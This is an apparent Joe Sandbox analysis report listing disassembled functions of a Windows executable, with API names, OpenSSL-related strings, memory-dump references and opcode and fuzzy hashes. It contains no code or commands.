                                                              • String ID: Error/warning (ANSI fallback)$Warning
                                                              • API String ID: 1878133881-2698358428
                                                              • Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                              • Instruction ID: 3ed3cb0239aaeb0ff4cb6b4e2db05f74bcbd9ad01f1ac0e3bf737689f830a1be
                                                              • Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                              • Instruction Fuzzy Hash: 18118172A28A4681EB20DB10F565BAD3364FB48B88F501135DA6D876A4EF3CE605C740
                                                              Function 00007FF6FB1E25F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Message$ByteCharMultiWide
                                                              • String ID: Error$Error/warning (ANSI fallback)
                                                              • API String ID: 1878133881-653037927
                                                              • Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                              • Instruction ID: 36a2b72a220d63366705eaaa16e71de296a558917ac96bff469b69b89cc2150d
                                                              • Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                              • Instruction Fuzzy Hash: 9F118E72A28A8681EB20DB00F565BAD6364FB4CBC8F901135DA6D876A4EF3CE605C740
                                                              Function 00007FFDFB00139D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastsocket
                                                              • String ID: ..\s\crypto\bio\b_sock2.c$2
                                                              • API String ID: 1120909799-2051290508
                                                              • Opcode ID: 7734bc7eb848a8c2f13e03d8370f2b6d25dc2938cf9324aa6d1bac55b8e4a966
                                                              • Instruction ID: d4161843b6e6fcc7b21a708a9dcf9532b4e6757e0bcf0df2a9dae95af6bc5020
                                                              • Opcode Fuzzy Hash: 7734bc7eb848a8c2f13e03d8370f2b6d25dc2938cf9324aa6d1bac55b8e4a966
                                                              • Instruction Fuzzy Hash: 8001C071B0A99383E7109B21E4109AE6260FF42798F504635E6BD43BFDCF3DD9019B40
                                                              Function 00007FF6FB1FB8B0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                              • String ID:
                                                              • API String ID: 2718003287-0
                                                              • Opcode ID: 0739f85a4d911baae0561c1f2f5b651aa469f8b70ac1dc09fd50f765aaaafbc7
                                                              • Instruction ID: e1affca7c548a8535667676dbf827b4e72c6a21703a0f50ba228eded790927d1
                                                              • Opcode Fuzzy Hash: 0739f85a4d911baae0561c1f2f5b651aa469f8b70ac1dc09fd50f765aaaafbc7
                                                              • Instruction Fuzzy Hash: C3D1D176F08A8289E721CF69D5402AD37B1FB487D8B144235CE6E97BE9EE38D516C300
                                                              Function 00007FF6FB1FC270 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FB1FC25B), ref: 00007FF6FB1FC38C
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FB1FC25B), ref: 00007FF6FB1FC417
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ConsoleErrorLastMode
                                                              • String ID:
                                                              • API String ID: 953036326-0
                                                              • Opcode ID: 76adbd728b317254a89cb4c791728419eb9f151af89ead0c9a06842c56e3605f
                                                              • Instruction ID: a7dbcbc1e1f74e19b309d2fcd1c6570bcd3f85d178627569dfc7b3fa630c83f6
                                                              • Opcode Fuzzy Hash: 76adbd728b317254a89cb4c791728419eb9f151af89ead0c9a06842c56e3605f
                                                              • Instruction Fuzzy Hash: ED91AF72F1865385F760DB69A4502BD2BA0BB48B8CF144139DE2EE6EE5EE38D441D700
                                                              Function 00007FFDFB002DEC Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 173COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID: Operation not permitted$unknown
                                                              • API String ID: 1452528299-31098287
                                                              • Opcode ID: 3eb7fdf123b224d789d6a34ffa9101ea107b745f6317a6d8691ddf250b284916
                                                              • Instruction ID: d74a3a7d97b2a96285dba25a36f01989142933d439fe4b2a47a498b2572399d4
                                                              • Opcode Fuzzy Hash: 3eb7fdf123b224d789d6a34ffa9101ea107b745f6317a6d8691ddf250b284916
                                                              • Instruction Fuzzy Hash: F4815C22F5AA439AEB10AB11E874B7927A1FB81788F480235DD6D836FDDF7CE4459700
                                                              Function 00007FF6FB1FEC9C Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _get_daylight$_isindst
                                                              • String ID:
                                                              • API String ID: 4170891091-0
                                                              • Opcode ID: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
                                                              • Instruction ID: d4ceb545be7043e67d001a431b80e9bf04aaf939a909428c11a316e0b72fea94
                                                              • Opcode Fuzzy Hash: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
                                                              • Instruction Fuzzy Hash: 1751E573F041138AEB14DF64AD956BD27A2AB5839DF540135DD2ED2AF6EF38A501C700
                                                              Function 00007FF6FB1F4A8C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                              • String ID:
                                                              • API String ID: 2780335769-0
                                                              • Opcode ID: 44011dbc5c196255e5d063134f532b0674048b95aab6dcf0e225215e54208c6d
                                                              • Instruction ID: 4ec867d2007e2f41d018b0819f3d7f61bae324759b9f82f4574747d48d87c50b
                                                              • Opcode Fuzzy Hash: 44011dbc5c196255e5d063134f532b0674048b95aab6dcf0e225215e54208c6d
                                                              • Instruction Fuzzy Hash: 35516822E086428AFB24DF7194503BD23A1AF4CB9CF149535DE29C76A9EF38D5A1C740
                                                              Function 00007FF6FB1E2030 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: LongWindow$DialogInvalidateRect
                                                              • String ID:
                                                              • API String ID: 1956198572-0
                                                              • Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                              • Instruction ID: 59bb9a2abd7cb7dc067461ba02fc92d881dd4d05ad8528567b615fd358c1a378
                                                              • Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                              • Instruction Fuzzy Hash: 1A11C631E0814342FB64EB6AE55827D1291EF8CBC4F949031DA6987FEAED2CF4C18640
                                                              Function 00007FF6FB1EC330 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                              • String ID:
                                                              • API String ID: 2933794660-0
                                                              • Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                              • Instruction ID: 0d44c07b34abdebbf698619f9d83ddde915a951e6aea69ede6e902a6afa5f816
                                                              • Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                              • Instruction Fuzzy Hash: 9B114826B14B068AEB00DB60E9542BC33A4FB5D758F041E31DA2DC6BA4EF78E1998340
                                                              Function 00007FF6FB204E2C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _get_daylight$_invalid_parameter_noinfo
                                                              • String ID: ?
                                                              • API String ID: 1286766494-1684325040
                                                              • Opcode ID: 30789dec6190b383a199f118b84c25ff7dc7ec79571e837530472d1d90a39620
                                                              • Instruction ID: 11d8f06991529424cd6897463360c2c90a14e325b5a542a2007728b21feedea8
                                                              • Opcode Fuzzy Hash: 30789dec6190b383a199f118b84c25ff7dc7ec79571e837530472d1d90a39620
                                                              • Instruction Fuzzy Hash: 88412A12A0828345FB249B25D5253795660EF987E4F109235EE7CC6AF5FF3CD541C700
                                                              Function 00007FFDFB002743 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 118COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: 00007
                                                              • String ID: %02d%02d%02d%02d%02d%02dZ$%04d%02d%02d%02d%02d%02dZ
                                                              • API String ID: 3568877910-2648760357
                                                              • Opcode ID: 35c0674a6fc9a5195c317095fe527ac94bcdae6bb520b7aade9e85fd0519ba43
                                                              • Instruction ID: 5efa28e1edcf241e4b1ba7a9ecf14fa6d13e38bbe22d3a1de5c1e074c4807dec
                                                              • Opcode Fuzzy Hash: 35c0674a6fc9a5195c317095fe527ac94bcdae6bb520b7aade9e85fd0519ba43
                                                              • Instruction Fuzzy Hash: 50516132B1D7828AE760CB15E45066AB7A4FB89780F544135EA9D87BEDEF3CE4419B00
                                                              Function 00007FFDFB001613 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: getaddrinfo
                                                              • String ID: ..\s\crypto\bio\b_addr.c
                                                              • API String ID: 300660673-2547254400
                                                              • Opcode ID: cee4118a91f4e298bb24630199019e17d2161ccb3740edd78188986782efcc03
                                                              • Instruction ID: f1b95439acf8b30d26a2d2961f732bfff81405c81f708239639b6b5538a7bf41
                                                              • Opcode Fuzzy Hash: cee4118a91f4e298bb24630199019e17d2161ccb3740edd78188986782efcc03
                                                              • Instruction Fuzzy Hash: 8341F872B1968387E721DF12A890ABE77A0FB85780F004135FA9943BE9DF3CD4459B40
                                                              Function 00007FF6FB1F832C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FB1F835E
                                                                • Part of subcall function 00007FF6FB1F9C58: HeapFree.KERNEL32(?,?,?,00007FF6FB202032,?,?,?,00007FF6FB20206F,?,?,00000000,00007FF6FB202535,?,?,?,00007FF6FB202467), ref: 00007FF6FB1F9C6E
                                                                • Part of subcall function 00007FF6FB1F9C58: GetLastError.KERNEL32(?,?,?,00007FF6FB202032,?,?,?,00007FF6FB20206F,?,?,00000000,00007FF6FB202535,?,?,?,00007FF6FB202467), ref: 00007FF6FB1F9C78
                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6FB1EBEC5), ref: 00007FF6FB1F837C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                              • String ID: C:\Users\user\Desktop\e45AiBoV6X.exe
                                                              • API String ID: 3580290477-3551109972
                                                              • Opcode ID: b12c586edd81a32e618353e8c6e47471c9321224668f8732ac6121a92b7f4d59
                                                              • Instruction ID: 10b7e5f03b503dde526c9d0b3b79f6bc87970166dcc8d70c70fc678bf12099f0
                                                              • Opcode Fuzzy Hash: b12c586edd81a32e618353e8c6e47471c9321224668f8732ac6121a92b7f4d59
